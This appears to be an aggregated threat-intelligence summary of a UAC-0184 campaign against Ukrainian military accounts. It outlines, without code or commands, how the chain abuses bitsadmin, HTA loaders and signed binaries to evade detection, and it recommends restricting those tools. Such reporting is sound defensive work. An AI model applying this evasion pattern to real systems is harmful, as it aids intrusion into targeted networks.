UAC-0184 Malware Targets Ukrainian Military Networks Using Bitsadmin
Severity: High (Score: 72.6)
Sources: Cybersecuritynews, Gbhackers
Published: · Updated:
Keywords: chain, uac-0184, bitsadmin, newly, documented, attack, linked
Summary
UAC-0184 has deployed a multi-stage malware chain that utilizes the Windows bitsadmin tool and HTA files to deliver obfuscated payloads. This campaign primarily targets Ukrainian military networks, specifically accounts linked to the Armed Forces of Ukraine. The malware disguises itself using signed binaries like VSLauncher.exe and PassMark Endpoint to maintain stealth. CERT-UA has reported on this activity throughout 2024 and 2025, indicating a focused effort on military-related targets. The attack highlights the ongoing cyber threats faced by Ukraine amid geopolitical tensions. The full scope of the impact remains under investigation as security teams respond to the threat. Key Points: • UAC-0184 uses bitsadmin and HTA files to deliver malware to Ukrainian military networks. • The campaign targets accounts associated with the Armed Forces of Ukraine. • Malware employs signed binaries for stealth, complicating detection efforts.
Detailed Analysis
**Impact** The campaign targets Ukrainian military networks, specifically accounts linked to the Armed Forces of Ukraine. The operation affects military personnel and associated defense infrastructure within Ukraine. The scope includes stealthy network access, potentially compromising sensitive military data and operational capabilities. No specific numbers of affected systems or data volumes were provided. **Technical Details** The attack chain uses a multi-stage malware deployment involving Windows’ built-in bitsadmin tool and HTA loaders to deliver a heavily obfuscated payload bundle. The payload is concealed behind signed binaries such as VSLauncher.exe and PassMark Endpoint to evade detection. The campaign focuses on initial access and persistence stages, leveraging legitimate tools for stealth. No CVEs or specific infrastructure details were disclosed. No IOCs were mentioned. **Recommended Response** Monitor and restrict the use of bitsadmin and HTA files within the network, especially on systems related to military operations. Implement behavioral detections for anomalous execution of signed binaries like VSLauncher.exe and PassMark Endpoint. Harden endpoint security controls to detect obfuscated payloads and enforce application whitelisting. No patching or specific indicators were provided; continuous monitoring of military network traffic and account activity is advised.
Source articles (2)
- UAC — Cybersecuritynews · 2026-05-19
A newly documented attack chain linked to the threat group UAC-0184 has been observed using Windows’ built-in bitsadmin tool and HTA files to sneak malicious payloads onto targeted systems. The campai… - UAC — Gbhackers · 2026-05-19
UAC-0184 uses a multi‑stage malware chain that abuses bitsadmin and HTA loaders to reach a heavily obfuscated payload bundle, ultimately hiding behind signed binaries such as VSLauncher.exe and PassMa…
Timeline
- 2024-01-01 — CERT-UA begins reporting on UAC-0184 activity: CERT-UA documented the initial signs of UAC-0184 targeting military networks in Ukraine.
- 2025-12-01 — Increased targeting of military accounts: Reports indicated a rise in attacks focused on accounts belonging to the Armed Forces of Ukraine.
- 2026-05-19 — UAC-0184 malware chain documented: Cybersecurity analysts released findings on UAC-0184's use of bitsadmin and HTA files to infiltrate systems.
Related entities
- Malware (Attack Type)
- Ukraine (Country)
- Uac-0184 (Apt Group)
- T1027 - Obfuscated Files Or Information (Mitre Attack)
- T1059.005 - Visual Basic (Mitre Attack)
- T1105 - Ingress Tool Transfer (Mitre Attack)
- T1197 - BITS Jobs (Mitre Attack)
- T1218.005 - Mshta (Mitre Attack)
- T1218 - System Binary Proxy Execution (Mitre Attack)
- Windows (Platform)
- Bitsadmin (Tool)